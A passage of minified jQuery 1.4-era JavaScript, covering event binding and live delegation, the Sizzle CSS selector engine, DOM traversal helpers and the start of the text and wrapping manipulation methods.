if(data!=null||val){e.type="change";return jQuery.event.trigger(e,arguments[1],elem);}};jQuery.event.special.change={filters:{focusout:testChange,click:function(e){var elem=e.target,type=elem.type;if(type==="radio"||type==="checkbox"||elem.nodeName.toLowerCase()==="select"){return testChange.call(this,e);}},keydown:function(e){var elem=e.target,type=elem.type;if((e.keyCode===13&&elem.nodeName.toLowerCase()!=="textarea")||(e.keyCode===32&&(type==="checkbox"||type==="radio"))||type==="select-multiple"){return testChange.call(this,e);}},beforeactivate:function(e){var elem=e.target;jQuery.data(elem,"_change_data",getVal(elem));}},setup:function(data,namespaces){if(this.type==="file"){return false;}
for(var type in changeFilters){jQuery.event.add(this,type+".specialChange",changeFilters[type]);}
return formElems.test(this.nodeName);},teardown:function(namespaces){jQuery.event.remove(this,".specialChange");return formElems.test(this.nodeName);}};changeFilters=jQuery.event.special.change.filters;}
function trigger(type,elem,args){args[0].type=type;return jQuery.event.handle.apply(elem,args);}
if(document.addEventListener){jQuery.each({focus:"focusin",blur:"focusout"},function(orig,fix){jQuery.event.special[fix]={setup:function(){this.addEventListener(orig,handler,true);},teardown:function(){this.removeEventListener(orig,handler,true);}};function handler(e){e=jQuery.event.fix(e);e.type=fix;return jQuery.event.handle.call(this,e);}});}
jQuery.each(["bind","one"],function(i,name){jQuery.fn[name]=function(type,data,fn){if(typeof type==="object"){for(var key in type){this[name](key,data,type[key],fn);}
return this;}
if(jQuery.isFunction(data)){fn=data;data=undefined;}
var handler=name==="one"?jQuery.proxy(fn,function(event){jQuery(this).unbind(event,handler);return fn.apply(this,arguments);}):fn;if(type==="unload"&&name!=="one"){this.one(type,data,fn);}else{for(var i=0,l=this.length;i<l;i++){jQuery.event.add(this[i],type,handler,data);}}
return this;};});jQuery.fn.extend({unbind:function(type,fn){if(typeof type==="object"&&!type.preventDefault){for(var key in type){this.unbind(key,type[key]);}}else{for(var i=0,l=this.length;i<l;i++){jQuery.event.remove(this[i],type,fn);}}
return this;},delegate:function(selector,types,data,fn){return this.live(types,data,fn,selector);},undelegate:function(selector,types,fn){if(arguments.length===0){return this.unbind("live");}else{return this.die(types,null,fn,selector);}},trigger:function(type,data){return this.each(function(){jQuery.event.trigger(type,data,this);});},triggerHandler:function(type,data){if(this[0]){var event=jQuery.Event(type);event.preventDefault();event.stopPropagation();jQuery.event.trigger(event,data,this[0]);return event.result;}},toggle:function(fn){var args=arguments,i=1;while(i<args.length){jQuery.proxy(fn,args[i++]);}
return this.click(jQuery.proxy(fn,function(event){var lastToggle=(jQuery.data(this,"lastToggle"+fn.guid)||0)%i;jQuery.data(this,"lastToggle"+fn.guid,lastToggle+1);event.preventDefault();return args[lastToggle].apply(this,arguments)||false;}));},hover:function(fnOver,fnOut){return this.mouseenter(fnOver).mouseleave(fnOut||fnOver);}});var liveMap={focus:"focusin",blur:"focusout",mouseenter:"mouseover",mouseleave:"mouseout"};jQuery.each(["live","die"],function(i,name){jQuery.fn[name]=function(types,data,fn,origSelector){var type,i=0,match,namespaces,preType,selector=origSelector||this.selector,context=origSelector?this:jQuery(this.context);if(jQuery.isFunction(data)){fn=data;data=undefined;}
types=(types||"").split(" ");while((type=types[i++])!=null){match=rnamespaces.exec(type);namespaces="";if(match){namespaces=match[0];type=type.replace(rnamespaces,"");}
if(type==="hover"){types.push("mouseenter"+namespaces,"mouseleave"+namespaces);continue;}
preType=type;if(type==="focus"||type==="blur"){types.push(liveMap[type]+namespaces);type=type+namespaces;}else{type=(liveMap[type]||type)+namespaces;}
if(name==="live"){context.each(function(){jQuery.event.add(this,liveConvert(type,selector),{data:data,selector:selector,handler:fn,origType:type,origHandler:fn,preType:preType});});}else{context.unbind(liveConvert(type,selector),fn);}}
return this;}});function liveHandler(event){var stop,elems=[],selectors=[],args=arguments,related,match,handleObj,elem,j,i,l,data,events=jQuery.data(this,"events");if(event.liveFired===this||!events||!events.live||event.button&&event.type==="click"){return;}
event.liveFired=this;var live=events.live.slice(0);for(j=0;j<live.length;j++){handleObj=live[j];if(handleObj.origType.replace(rnamespaces,"")===event.type){selectors.push(handleObj.selector);}else{live.splice(j--,1);}}
match=jQuery(event.target).closest(selectors,event.currentTarget);for(i=0,l=match.length;i<l;i++){for(j=0;j<live.length;j++){handleObj=live[j];if(match[i].selector===handleObj.selector){elem=match[i].elem;related=null;if(handleObj.preType==="mouseenter"||handleObj.preType==="mouseleave"){related=jQuery(event.relatedTarget).closest(handleObj.selector)[0];}
if(!related||related!==elem){elems.push({elem:elem,handleObj:handleObj});}}}}
for(i=0,l=elems.length;i<l;i++){match=elems[i];event.currentTarget=match.elem;event.data=match.handleObj.data;event.handleObj=match.handleObj;if(match.handleObj.origHandler.apply(match.elem,args)===false){stop=false;break;}}
return stop;}
function liveConvert(type,selector){return"live."+(type&&type!=="*"?type+".":"")+selector.replace(/\./g,"`").replace(/ /g,"&");}
jQuery.each(("blur focus focusin focusout load resize scroll unload click dblclick "+"mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave "+"change select submit keydown keypress keyup error").split(" "),function(i,name){jQuery.fn[name]=function(fn){return fn?this.bind(name,fn):this.trigger(name);};if(jQuery.attrFn){jQuery.attrFn[name]=true;}});if(window.attachEvent&&!window.addEventListener){window.attachEvent("onunload",function(){for(var id in jQuery.cache){if(jQuery.cache[id].handle){try{jQuery.event.remove(jQuery.cache[id].handle.elem);}catch(e){}}}});}
(function(){var chunker=/((?:\((?:\([^()]+\)|[^()]+)+\)|\[(?:\[[^[\]]*\]|['"][^'"]*['"]|[^[\]'"]+)+\]|\\.|[^ >+~,(\[\\]+)+|[>+~])(\s*,\s*)?((?:.|\r|\n)*)/g,done=0,toString=Object.prototype.toString,hasDuplicate=false,baseHasDuplicate=true;[0,0].sort(function(){baseHasDuplicate=false;return 0;});var Sizzle=function(selector,context,results,seed){results=results||[];var origContext=context=context||document;if(context.nodeType!==1&&context.nodeType!==9){return[];}
if(!selector||typeof selector!=="string"){return results;}
var parts=[],m,set,checkSet,extra,prune=true,contextXML=isXML(context),soFar=selector;while((chunker.exec(""),m=chunker.exec(soFar))!==null){soFar=m[3];parts.push(m[1]);if(m[2]){extra=m[3];break;}}
if(parts.length>1&&origPOS.exec(selector)){if(parts.length===2&&Expr.relative[parts[0]]){set=posProcess(parts[0]+parts[1],context);}else{set=Expr.relative[parts[0]]?[context]:Sizzle(parts.shift(),context);while(parts.length){selector=parts.shift();if(Expr.relative[selector]){selector+=parts.shift();}
set=posProcess(selector,set);}}}else{if(!seed&&parts.length>1&&context.nodeType===9&&!contextXML&&Expr.match.ID.test(parts[0])&&!Expr.match.ID.test(parts[parts.length-1])){var ret=Sizzle.find(parts.shift(),context,contextXML);context=ret.expr?Sizzle.filter(ret.expr,ret.set)[0]:ret.set[0];}
if(context){var ret=seed?{expr:parts.pop(),set:makeArray(seed)}:Sizzle.find(parts.pop(),parts.length===1&&(parts[0]==="~"||parts[0]==="+")&&context.parentNode?context.parentNode:context,contextXML);set=ret.expr?Sizzle.filter(ret.expr,ret.set):ret.set;if(parts.length>0){checkSet=makeArray(set);}else{prune=false;}
while(parts.length){var cur=parts.pop(),pop=cur;if(!Expr.relative[cur]){cur="";}else{pop=parts.pop();}
if(pop==null){pop=context;}
Expr.relative[cur](checkSet,pop,contextXML);}}else{checkSet=parts=[];}}
if(!checkSet){checkSet=set;}
if(!checkSet){Sizzle.error(cur||selector);}
if(toString.call(checkSet)==="[object Array]"){if(!prune){results.push.apply(results,checkSet);}else if(context&&context.nodeType===1){for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&(checkSet[i]===true||checkSet[i].nodeType===1&&contains(context,checkSet[i]))){results.push(set[i]);}}}else{for(var i=0;checkSet[i]!=null;i++){if(checkSet[i]&&checkSet[i].nodeType===1){results.push(set[i]);}}}}else{makeArray(checkSet,results);}
if(extra){Sizzle(extra,origContext,results,seed);Sizzle.uniqueSort(results);}
return results;};Sizzle.uniqueSort=function(results){if(sortOrder){hasDuplicate=baseHasDuplicate;results.sort(sortOrder);if(hasDuplicate){for(var i=1;i<results.length;i++){if(results[i]===results[i-1]){results.splice(i--,1);}}}}
return results;};Sizzle.matches=function(expr,set){return Sizzle(expr,null,null,set);};Sizzle.find=function(expr,context,isXML){var set,match;if(!expr){return[];}
for(var i=0,l=Expr.order.length;i<l;i++){var type=Expr.order[i],match;if((match=Expr.leftMatch[type].exec(expr))){var left=match[1];match.splice(1,1);if(left.substr(left.length-1)!=="\\"){match[1]=(match[1]||"").replace(/\\/g,"");set=Expr.find[type](match,context,isXML);if(set!=null){expr=expr.replace(Expr.match[type],"");break;}}}}
if(!set){set=context.getElementsByTagName("*");}
return{set:set,expr:expr};};Sizzle.filter=function(expr,set,inplace,not){var old=expr,result=[],curLoop=set,match,anyFound,isXMLFilter=set&&set[0]&&isXML(set[0]);while(expr&&set.length){for(var type in Expr.filter){if((match=Expr.leftMatch[type].exec(expr))!=null&&match[2]){var filter=Expr.filter[type],found,item,left=match[1];anyFound=false;match.splice(1,1);if(left.substr(left.length-1)==="\\"){continue;}
if(curLoop===result){result=[];}
if(Expr.preFilter[type]){match=Expr.preFilter[type](match,curLoop,inplace,result,not,isXMLFilter);if(!match){anyFound=found=true;}else if(match===true){continue;}}
if(match){for(var i=0;(item=curLoop[i])!=null;i++){if(item){found=filter(item,match,i,curLoop);var pass=not^!!found;if(inplace&&found!=null){if(pass){anyFound=true;}else{curLoop[i]=false;}}else if(pass){result.push(item);anyFound=true;}}}}
if(found!==undefined){if(!inplace){curLoop=result;}
expr=expr.replace(Expr.match[type],"");if(!anyFound){return[];}
break;}}}
if(expr===old){if(anyFound==null){Sizzle.error(expr);}else{break;}}
old=expr;}
return curLoop;};Sizzle.error=function(msg){throw"Syntax error, unrecognized expression: "+msg;};var Expr=Sizzle.selectors={order:["ID","NAME","TAG"],match:{ID:/#((?:[\w\u00c0-\uFFFF-]|\\.)+)/,CLASS:/\.((?:[\w\u00c0-\uFFFF-]|\\.)+)/,NAME:/\[name=['"]*((?:[\w\u00c0-\uFFFF-]|\\.)+)['"]*\]/,ATTR:/\[\s*((?:[\w\u00c0-\uFFFF-]|\\.)+)\s*(?:(\S?=)\s*(['"]*)(.*?)\3|)\s*\]/,TAG:/^((?:[\w\u00c0-\uFFFF\*-]|\\.)+)/,CHILD:/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,POS:/:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,PSEUDO:/:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['"]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},leftMatch:{},attrMap:{"class":"className","for":"htmlFor"},attrHandle:{href:function(elem){return elem.getAttribute("href");}},relative:{"+":function(checkSet,part){var isPartStr=typeof part==="string",isTag=isPartStr&&!/\W/.test(part),isPartStrNotTag=isPartStr&&!isTag;if(isTag){part=part.toLowerCase();}
for(var i=0,l=checkSet.length,elem;i<l;i++){if((elem=checkSet[i])){while((elem=elem.previousSibling)&&elem.nodeType!==1){}
checkSet[i]=isPartStrNotTag||elem&&elem.nodeName.toLowerCase()===part?elem||false:elem===part;}}
if(isPartStrNotTag){Sizzle.filter(part,checkSet,true);}},">":function(checkSet,part){var isPartStr=typeof part==="string";if(isPartStr&&!/\W/.test(part)){part=part.toLowerCase();for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){var parent=elem.parentNode;checkSet[i]=parent.nodeName.toLowerCase()===part?parent:false;}}}else{for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){checkSet[i]=isPartStr?elem.parentNode:elem.parentNode===part;}}
if(isPartStr){Sizzle.filter(part,checkSet,true);}}},"":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck;}
checkFn("parentNode",part,doneName,checkSet,nodeCheck,isXML);},"~":function(checkSet,part,isXML){var doneName=done++,checkFn=dirCheck;if(typeof part==="string"&&!/\W/.test(part)){var nodeCheck=part=part.toLowerCase();checkFn=dirNodeCheck;}
checkFn("previousSibling",part,doneName,checkSet,nodeCheck,isXML);}},find:{ID:function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?[m]:[];}},NAME:function(match,context){if(typeof context.getElementsByName!=="undefined"){var ret=[],results=context.getElementsByName(match[1]);for(var i=0,l=results.length;i<l;i++){if(results[i].getAttribute("name")===match[1]){ret.push(results[i]);}}
return ret.length===0?null:ret;}},TAG:function(match,context){return context.getElementsByTagName(match[1]);}},preFilter:{CLASS:function(match,curLoop,inplace,result,not,isXML){match=" "+match[1].replace(/\\/g,"")+" ";if(isXML){return match;}
for(var i=0,elem;(elem=curLoop[i])!=null;i++){if(elem){if(not^(elem.className&&(" "+elem.className+" ").replace(/[\t\n]/g," ").indexOf(match)>=0)){if(!inplace){result.push(elem);}}else if(inplace){curLoop[i]=false;}}}
return false;},ID:function(match){return match[1].replace(/\\/g,"");},TAG:function(match,curLoop){return match[1].toLowerCase();},CHILD:function(match){if(match[1]==="nth"){var test=/(-?)(\d*)n((?:\+|-)?\d*)/.exec(match[2]==="even"&&"2n"||match[2]==="odd"&&"2n+1"||!/\D/.test(match[2])&&"0n+"+match[2]||match[2]);match[2]=(test[1]+(test[2]||1))-0;match[3]=test[3]-0;}
match[0]=done++;return match;},ATTR:function(match,curLoop,inplace,result,not,isXML){var name=match[1].replace(/\\/g,"");if(!isXML&&Expr.attrMap[name]){match[1]=Expr.attrMap[name];}
if(match[2]==="~="){match[4]=" "+match[4]+" ";}
return match;},PSEUDO:function(match,curLoop,inplace,result,not){if(match[1]==="not"){if((chunker.exec(match[3])||"").length>1||/^\w/.test(match[3])){match[3]=Sizzle(match[3],null,null,curLoop);}else{var ret=Sizzle.filter(match[3],curLoop,inplace,true^not);if(!inplace){result.push.apply(result,ret);}
return false;}}else if(Expr.match.POS.test(match[0])||Expr.match.CHILD.test(match[0])){return true;}
return match;},POS:function(match){match.unshift(true);return match;}},filters:{enabled:function(elem){return elem.disabled===false&&elem.type!=="hidden";},disabled:function(elem){return elem.disabled===true;},checked:function(elem){return elem.checked===true;},selected:function(elem){elem.parentNode.selectedIndex;return elem.selected===true;},parent:function(elem){return!!elem.firstChild;},empty:function(elem){return!elem.firstChild;},has:function(elem,i,match){return!!Sizzle(match[3],elem).length;},header:function(elem){return/h\d/i.test(elem.nodeName);},text:function(elem){return"text"===elem.type;},radio:function(elem){return"radio"===elem.type;},checkbox:function(elem){return"checkbox"===elem.type;},file:function(elem){return"file"===elem.type;},password:function(elem){return"password"===elem.type;},submit:function(elem){return"submit"===elem.type;},image:function(elem){return"image"===elem.type;},reset:function(elem){return"reset"===elem.type;},button:function(elem){return"button"===elem.type||elem.nodeName.toLowerCase()==="button";},input:function(elem){return/input|select|textarea|button/i.test(elem.nodeName);}},setFilters:{first:function(elem,i){return i===0;},last:function(elem,i,match,array){return i===array.length-1;},even:function(elem,i){return i%2===0;},odd:function(elem,i){return i%2===1;},lt:function(elem,i,match){return i<match[3]-0;},gt:function(elem,i,match){return i>match[3]-0;},nth:function(elem,i,match){return match[3]-0===i;},eq:function(elem,i,match){return match[3]-0===i;}},filter:{PSEUDO:function(elem,match,i,array){var name=match[1],filter=Expr.filters[name];if(filter){return filter(elem,i,match,array);}else if(name==="contains"){return(elem.textContent||elem.innerText||getText([elem])||"").indexOf(match[3])>=0;}else if(name==="not"){var not=match[3];for(var i=0,l=not.length;i<l;i++){if(not[i]===elem){return false;}}
return true;}else{Sizzle.error("Syntax error, unrecognized expression: "+name);}},CHILD:function(elem,match){var type=match[1],node=elem;switch(type){case'only':case'first':while((node=node.previousSibling)){if(node.nodeType===1){return false;}}
if(type==="first"){return true;}
node=elem;case'last':while((node=node.nextSibling)){if(node.nodeType===1){return false;}}
return true;case'nth':var first=match[2],last=match[3];if(first===1&&last===0){return true;}
var doneName=match[0],parent=elem.parentNode;if(parent&&(parent.sizcache!==doneName||!elem.nodeIndex)){var count=0;for(node=parent.firstChild;node;node=node.nextSibling){if(node.nodeType===1){node.nodeIndex=++count;}}
parent.sizcache=doneName;}
var diff=elem.nodeIndex-last;if(first===0){return diff===0;}else{return(diff%first===0&&diff/first>=0);}}},ID:function(elem,match){return elem.nodeType===1&&elem.getAttribute("id")===match;},TAG:function(elem,match){return(match==="*"&&elem.nodeType===1)||elem.nodeName.toLowerCase()===match;},CLASS:function(elem,match){return(" "+(elem.className||elem.getAttribute("class"))+" ").indexOf(match)>-1;},ATTR:function(elem,match){var name=match[1],result=Expr.attrHandle[name]?Expr.attrHandle[name](elem):elem[name]!=null?elem[name]:elem.getAttribute(name),value=result+"",type=match[2],check=match[4];return result==null?type==="!=":type==="="?value===check:type==="*="?value.indexOf(check)>=0:type==="~="?(" "+value+" ").indexOf(check)>=0:!check?value&&result!==false:type==="!="?value!==check:type==="^="?value.indexOf(check)===0:type==="$="?value.substr(value.length-check.length)===check:type==="|="?value===check||value.substr(0,check.length+1)===check+"-":false;},POS:function(elem,match,i,array){var name=match[2],filter=Expr.setFilters[name];if(filter){return filter(elem,i,match,array);}}}};var origPOS=Expr.match.POS;for(var type in Expr.match){Expr.match[type]=new RegExp(Expr.match[type].source+/(?![^\[]*\])(?![^\(]*\))/.source);Expr.leftMatch[type]=new RegExp(/(^(?:.|\r|\n)*?)/.source+Expr.match[type].source.replace(/\\(\d+)/g,function(all,num){return"\\"+(num-0+1);}));}
var makeArray=function(array,results){array=Array.prototype.slice.call(array,0);if(results){results.push.apply(results,array);return results;}
return array;};try{Array.prototype.slice.call(document.documentElement.childNodes,0)[0].nodeType;}catch(e){makeArray=function(array,results){var ret=results||[];if(toString.call(array)==="[object Array]"){Array.prototype.push.apply(ret,array);}else{if(typeof array.length==="number"){for(var i=0,l=array.length;i<l;i++){ret.push(array[i]);}}else{for(var i=0;array[i];i++){ret.push(array[i]);}}}
return ret;};}
var sortOrder;if(document.documentElement.compareDocumentPosition){sortOrder=function(a,b){if(!a.compareDocumentPosition||!b.compareDocumentPosition){if(a==b){hasDuplicate=true;}
return a.compareDocumentPosition?-1:1;}
var ret=a.compareDocumentPosition(b)&4?-1:a===b?0:1;if(ret===0){hasDuplicate=true;}
return ret;};}else if("sourceIndex"in document.documentElement){sortOrder=function(a,b){if(!a.sourceIndex||!b.sourceIndex){if(a==b){hasDuplicate=true;}
return a.sourceIndex?-1:1;}
var ret=a.sourceIndex-b.sourceIndex;if(ret===0){hasDuplicate=true;}
return ret;};}else if(document.createRange){sortOrder=function(a,b){if(!a.ownerDocument||!b.ownerDocument){if(a==b){hasDuplicate=true;}
return a.ownerDocument?-1:1;}
var aRange=a.ownerDocument.createRange(),bRange=b.ownerDocument.createRange();aRange.setStart(a,0);aRange.setEnd(a,0);bRange.setStart(b,0);bRange.setEnd(b,0);var ret=aRange.compareBoundaryPoints(Range.START_TO_END,bRange);if(ret===0){hasDuplicate=true;}
return ret;};}
function getText(elems){var ret="",elem;for(var i=0;elems[i];i++){elem=elems[i];if(elem.nodeType===3||elem.nodeType===4){ret+=elem.nodeValue;}else if(elem.nodeType!==8){ret+=getText(elem.childNodes);}}
return ret;}
(function(){var form=document.createElement("div"),id="script"+(new Date).getTime();form.innerHTML="<a name='"+id+"'/>";var root=document.documentElement;root.insertBefore(form,root.firstChild);if(document.getElementById(id)){Expr.find.ID=function(match,context,isXML){if(typeof context.getElementById!=="undefined"&&!isXML){var m=context.getElementById(match[1]);return m?m.id===match[1]||typeof m.getAttributeNode!=="undefined"&&m.getAttributeNode("id").nodeValue===match[1]?[m]:undefined:[];}};Expr.filter.ID=function(elem,match){var node=typeof elem.getAttributeNode!=="undefined"&&elem.getAttributeNode("id");return elem.nodeType===1&&node&&node.nodeValue===match;};}
root.removeChild(form);root=form=null;})();(function(){var div=document.createElement("div");div.appendChild(document.createComment(""));if(div.getElementsByTagName("*").length>0){Expr.find.TAG=function(match,context){var results=context.getElementsByTagName(match[1]);if(match[1]==="*"){var tmp=[];for(var i=0;results[i];i++){if(results[i].nodeType===1){tmp.push(results[i]);}}
results=tmp;}
return results;};}
div.innerHTML="<a href='#'></a>";if(div.firstChild&&typeof div.firstChild.getAttribute!=="undefined"&&div.firstChild.getAttribute("href")!=="#"){Expr.attrHandle.href=function(elem){return elem.getAttribute("href",2);};}
div=null;})();if(document.querySelectorAll){(function(){var oldSizzle=Sizzle,div=document.createElement("div");div.innerHTML="<p class='TEST'></p>";if(div.querySelectorAll&&div.querySelectorAll(".TEST").length===0){return;}
Sizzle=function(query,context,extra,seed){context=context||document;if(!seed&&context.nodeType===9&&!isXML(context)){try{return makeArray(context.querySelectorAll(query),extra);}catch(e){}}
return oldSizzle(query,context,extra,seed);};for(var prop in oldSizzle){Sizzle[prop]=oldSizzle[prop];}
div=null;})();}
(function(){var div=document.createElement("div");div.innerHTML="<div class='test e'></div><div class='test'></div>";if(!div.getElementsByClassName||div.getElementsByClassName("e").length===0){return;}
div.lastChild.className="e";if(div.getElementsByClassName("e").length===1){return;}
Expr.order.splice(1,0,"CLASS");Expr.find.CLASS=function(match,context,isXML){if(typeof context.getElementsByClassName!=="undefined"&&!isXML){return context.getElementsByClassName(match[1]);}};div=null;})();function dirNodeCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break;}
if(elem.nodeType===1&&!isXML){elem.sizcache=doneName;elem.sizset=i;}
if(elem.nodeName.toLowerCase()===cur){match=elem;break;}
elem=elem[dir];}
checkSet[i]=match;}}}
function dirCheck(dir,cur,doneName,checkSet,nodeCheck,isXML){for(var i=0,l=checkSet.length;i<l;i++){var elem=checkSet[i];if(elem){elem=elem[dir];var match=false;while(elem){if(elem.sizcache===doneName){match=checkSet[elem.sizset];break;}
if(elem.nodeType===1){if(!isXML){elem.sizcache=doneName;elem.sizset=i;}
if(typeof cur!=="string"){if(elem===cur){match=true;break;}}else if(Sizzle.filter(cur,[elem]).length>0){match=elem;break;}}
elem=elem[dir];}
checkSet[i]=match;}}}
var contains=document.compareDocumentPosition?function(a,b){return!!(a.compareDocumentPosition(b)&16);}:function(a,b){return a!==b&&(a.contains?a.contains(b):true);};var isXML=function(elem){var documentElement=(elem?elem.ownerDocument||elem:0).documentElement;return documentElement?documentElement.nodeName!=="HTML":false;};var posProcess=function(selector,context){var tmpSet=[],later="",match,root=context.nodeType?[context]:context;while((match=Expr.match.PSEUDO.exec(selector))){later+=match[0];selector=selector.replace(Expr.match.PSEUDO,"");}
selector=Expr.relative[selector]?selector+"*":selector;for(var i=0,l=root.length;i<l;i++){Sizzle(selector,root[i],tmpSet);}
return Sizzle.filter(later,tmpSet);};jQuery.find=Sizzle;jQuery.expr=Sizzle.selectors;jQuery.expr[":"]=jQuery.expr.filters;jQuery.unique=Sizzle.uniqueSort;jQuery.text=getText;jQuery.isXMLDoc=isXML;jQuery.contains=contains;return;window.Sizzle=Sizzle;})();var runtil=/Until$/,rparentsprev=/^(?:parents|prevUntil|prevAll)/,rmultiselector=/,/,slice=Array.prototype.slice;var winnow=function(elements,qualifier,keep){if(jQuery.isFunction(qualifier)){return jQuery.grep(elements,function(elem,i){return!!qualifier.call(elem,i,elem)===keep;});}else if(qualifier.nodeType){return jQuery.grep(elements,function(elem,i){return(elem===qualifier)===keep;});}else if(typeof qualifier==="string"){var filtered=jQuery.grep(elements,function(elem){return elem.nodeType===1;});if(isSimple.test(qualifier)){return jQuery.filter(qualifier,filtered,!keep);}else{qualifier=jQuery.filter(qualifier,filtered);}}
return jQuery.grep(elements,function(elem,i){return(jQuery.inArray(elem,qualifier)>=0)===keep;});};jQuery.fn.extend({find:function(selector){var ret=this.pushStack("","find",selector),length=0;for(var i=0,l=this.length;i<l;i++){length=ret.length;jQuery.find(selector,this[i],ret);if(i>0){for(var n=length;n<ret.length;n++){for(var r=0;r<length;r++){if(ret[r]===ret[n]){ret.splice(n--,1);break;}}}}}
return ret;},has:function(target){var targets=jQuery(target);return this.filter(function(){for(var i=0,l=targets.length;i<l;i++){if(jQuery.contains(this,targets[i])){return true;}}});},not:function(selector){return this.pushStack(winnow(this,selector,false),"not",selector);},filter:function(selector){return this.pushStack(winnow(this,selector,true),"filter",selector);},is:function(selector){return!!selector&&jQuery.filter(selector,this).length>0;},closest:function(selectors,context){if(jQuery.isArray(selectors)){var ret=[],cur=this[0],match,matches={},selector;if(cur&&selectors.length){for(var i=0,l=selectors.length;i<l;i++){selector=selectors[i];if(!matches[selector]){matches[selector]=jQuery.expr.match.POS.test(selector)?jQuery(selector,context||this.context):selector;}}
while(cur&&cur.ownerDocument&&cur!==context){for(selector in matches){match=matches[selector];if(match.jquery?match.index(cur)>-1:jQuery(cur).is(match)){ret.push({selector:selector,elem:cur});delete matches[selector];}}
cur=cur.parentNode;}}
return ret;}
var pos=jQuery.expr.match.POS.test(selectors)?jQuery(selectors,context||this.context):null;return this.map(function(i,cur){while(cur&&cur.ownerDocument&&cur!==context){if(pos?pos.index(cur)>-1:jQuery(cur).is(selectors)){return cur;}
cur=cur.parentNode;}
return null;});},index:function(elem){if(!elem||typeof elem==="string"){return jQuery.inArray(this[0],elem?jQuery(elem):this.parent().children());}
return jQuery.inArray(elem.jquery?elem[0]:elem,this);},add:function(selector,context){var set=typeof selector==="string"?jQuery(selector,context||this.context):jQuery.makeArray(selector),all=jQuery.merge(this.get(),set);return this.pushStack(isDisconnected(set[0])||isDisconnected(all[0])?all:jQuery.unique(all));},andSelf:function(){return this.add(this.prevObject);}});function isDisconnected(node){return!node||!node.parentNode||node.parentNode.nodeType===11;}
jQuery.each({parent:function(elem){var parent=elem.parentNode;return parent&&parent.nodeType!==11?parent:null;},parents:function(elem){return jQuery.dir(elem,"parentNode");},parentsUntil:function(elem,i,until){return jQuery.dir(elem,"parentNode",until);},next:function(elem){return jQuery.nth(elem,2,"nextSibling");},prev:function(elem){return jQuery.nth(elem,2,"previousSibling");},nextAll:function(elem){return jQuery.dir(elem,"nextSibling");},prevAll:function(elem){return jQuery.dir(elem,"previousSibling");},nextUntil:function(elem,i,until){return jQuery.dir(elem,"nextSibling",until);},prevUntil:function(elem,i,until){return jQuery.dir(elem,"previousSibling",until);},siblings:function(elem){return jQuery.sibling(elem.parentNode.firstChild,elem);},children:function(elem){return jQuery.sibling(elem.firstChild);},contents:function(elem){return jQuery.nodeName(elem,"iframe")?elem.contentDocument||elem.contentWindow.document:jQuery.makeArray(elem.childNodes);}},function(name,fn){jQuery.fn[name]=function(until,selector){var ret=jQuery.map(this,fn,until);if(!runtil.test(name)){selector=until;}
if(selector&&typeof selector==="string"){ret=jQuery.filter(selector,ret);}
ret=this.length>1?jQuery.unique(ret):ret;if((this.length>1||rmultiselector.test(selector))&&rparentsprev.test(name)){ret=ret.reverse();}
return this.pushStack(ret,name,slice.call(arguments).join(","));};});jQuery.extend({filter:function(expr,elems,not){if(not){expr=":not("+expr+")";}
return jQuery.find.matches(expr,elems);},dir:function(elem,dir,until){var matched=[],cur=elem[dir];while(cur&&cur.nodeType!==9&&(until===undefined||cur.nodeType!==1||!jQuery(cur).is(until))){if(cur.nodeType===1){matched.push(cur);}
cur=cur[dir];}
return matched;},nth:function(cur,result,dir,elem){result=result||1;var num=0;for(;cur;cur=cur[dir]){if(cur.nodeType===1&&++num===result){break;}}
return cur;},sibling:function(n,elem){var r=[];for(;n;n=n.nextSibling){if(n.nodeType===1&&n!==elem){r.push(n);}}
return r;}});var rinlinejQuery=/ jQuery\d+="(?:\d+|null)"/g,rleadingWhitespace=/^\s+/,rxhtmlTag=/(<([\w:]+)[^>]*?)\/>/g,rselfClosing=/^(?:area|br|col|embed|hr|img|input|link|meta|param)$/i,rtagName=/<([\w:]+)/,rtbody=/<tbody/i,rhtml=/<|&#?\w+;/,rnocache=/<script|<object|<embed|<option|<style/i,rchecked=/checked\s*(?:[^=]|=\s*.checked.)/i,fcloseTag=function(all,front,tag){return rselfClosing.test(tag)?all:front+"></"+tag+">";},wrapMap={option:[1,"<select multiple='multiple'>","</select>"],legend:[1,"<fieldset>","</fieldset>"],thead:[1,"<table>","</table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],col:[2,"<table><tbody></tbody><colgroup>","</colgroup></table>"],area:[1,"<map>","</map>"],_default:[0,"",""]};wrapMap.optgroup=wrapMap.option;wrapMap.tbody=wrapMap.tfoot=wrapMap.colgroup=wrapMap.caption=wrapMap.thead;wrapMap.th=wrapMap.td;if(!jQuery.support.htmlSerialize){wrapMap._default=[1,"div<div>","</div>"];}
jQuery.fn.extend({text:function(text){if(jQuery.isFunction(text)){return this.each(function(i){var self=jQuery(this);self.text(text.call(this,i,self.text()));});}
if(typeof text!=="object"&&text!==undefined){return this.empty().append((this[0]&&this[0].ownerDocument||document).createTextNode(text));}
return jQuery.text(this);},wrapAll:function(html){if(jQuery.isFunction(html)){return this.each(function(i){jQuery(this).wrapAll(html.call(this,i));});}
if(this[0]){var wrap=jQuery(html,this[0].ownerDocument).eq(0).clone(true);if(this[0].parentNode){wrap.insertBefore(this[0]);}
wrap.map(function(){var elem=this;while(elem.firstChild&&elem.firstChild.nodeType===1){elem=elem.firstChild;}
return elem;}).append(this);}
return this;},wrapInner:function(html){if(jQuery.isFunction(html)){return this.each(function(i){jQuery(this).wrapInner(html.call(this,i));});}
